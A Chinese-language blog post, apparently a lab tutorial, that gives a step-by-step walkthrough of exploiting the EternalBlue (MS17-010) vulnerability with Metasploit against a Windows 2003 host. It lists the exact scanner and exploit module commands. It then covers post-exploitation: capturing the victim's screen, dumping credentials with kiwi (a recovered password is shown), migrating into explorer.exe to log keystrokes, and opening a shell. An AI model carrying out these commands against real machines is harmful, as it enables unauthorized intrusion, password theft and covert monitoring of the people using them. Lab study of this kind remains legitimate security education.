代码编织梦想

开启msfconsole
在这里插入图片描述
搜索载荷,永恒之蓝的载荷是ms17_010
search ms17_010
然后use auxiliary/scanner/smb/smb_ms17_010 使用载荷,这个不是攻击载荷,这个是查看的有没有漏洞的,然后show options
在这里插入图片描述
set RHOSTS 192.168.132.129 添加host
在这里插入图片描述
set之后 run一下,是存在这个漏洞的
换成攻击载荷
use exploit/windows/smb/ms17_010_psexec
在这里插入图片描述
run之后拿到目标主机
在这里插入图片描述
拿到之后可以
1、获取屏幕数据screenshot
在这里插入图片描述
目标主机的屏幕数据保存在了root/JPGlloBJ.jpeg中了
在这里插入图片描述
打开图
在这里插入图片描述
在这里插入图片描述
2、除了截取屏幕还可以获取密码
先load kiwi加载字典后在这里插入图片描述
creds_all查看密码是auscoo
在这里插入图片描述

3、记录键盘信息
先查看进程ps | grep explorer.exe
在这里插入图片描述
进程是540,监听进程migrate 540
在这里插入图片描述
然后run post/windows/capture/keylog_recorderj就可以监听键盘了在这里插入图片描述
win2003随便输入后
在这里插入图片描述
kali中ctrl+c退出后
在这里插入图片描述
读取到的键盘内容被保存在/root/.msf4/loot/20230402110004_default_192.168.132.129_host.windows.key_145354.txt
cat命令查看一下
在这里插入图片描述
4、shell权限
在这里插入图片描述
在这里插入图片描述

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56664029/article/details/129905360